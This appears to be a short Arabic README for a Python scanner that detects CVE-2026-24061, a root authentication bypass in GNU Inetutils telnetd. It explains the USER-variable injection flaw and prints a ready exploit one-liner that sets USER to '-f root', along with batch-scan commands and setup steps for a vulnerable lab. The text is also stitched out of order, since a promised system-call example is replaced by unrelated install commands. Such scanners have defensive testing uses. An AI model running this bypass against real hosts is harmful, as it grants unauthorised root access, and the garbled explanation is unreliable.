
ماسح ضوئي مبني على Python يكتشف ثغرة CVE-2026-24061 في GNU Inetutils telnetd، مما يتيح الاختبار الدفعي لأهداف متعددة للتحقق من ثغرة تجاوز المصادقة.
⚠️ ملاحظة:
CVE-2026-24061GNU Inetutils هي مجموعة أدوات شبكات كلاسيكية مقدمة من مشروع GNU، وتتضمن خدمة telnetd، أي البرنامج الخفي لخادم Telnet. في الإصدارات من 1.9.3 إلى 2.7، توجد عيوب قاتلة في عملية مصادقة المستخدم لخدمة telnetd. عند استدعاء برنامج تسجيل الدخول النظامي /usr/bin/login، تفشل الخدمة في تصفية والتحقق من متغير البيئة USER المرسل من العميل بشكل فعال. يمكن للمهاجم حقن معامل -f مباشرة في أمر login عن طريق تعيين قيمة محددة لمتغير USER. يُستخدم معامل -f في برنامج login لتخطي المصادقة الثانوية، مما يسمح للمهاجم بتجاوز جميع خطوات التحقق من كلمة المرور تمامًا، وإنشاء جلسة عن بُعد مباشرة كمستخدم root، وبالتالي الحصول على أعلى صلاحيات التحكم في الخادم. هذه الثغرة شديدة الخطورة، وتعادل بابًا خلفيًا مفتوحًا لجذر النظام عن بُعد دون الحاجة إلى أي بيانات اعتماد.
USER='-f root' telnet -a <target_ip>

python3 cve-2026-24061.py -i 10.10.168.128
python3 cve-2026-24061.py -f targets.txt
يقوم الأمر أعلاه بتعيين متغير البيئة USER إلى -f root. عندما تستقبل خدمة telnetd المعرضة للثغرة الاتصال، فإنها تنشئ وتنفذ استدعاء نظام مشابه لما يلي:
sudo apt update
sudo apt install openbsd-inetd inetutils-telnetd telnet -y
sudo sed -i 's/^#telnet/telnet/' /etc/inetd.conf
sudo systemctl restart openbsd-inetd
sudo ss -tuln | grep ':23'
telnet localhost 23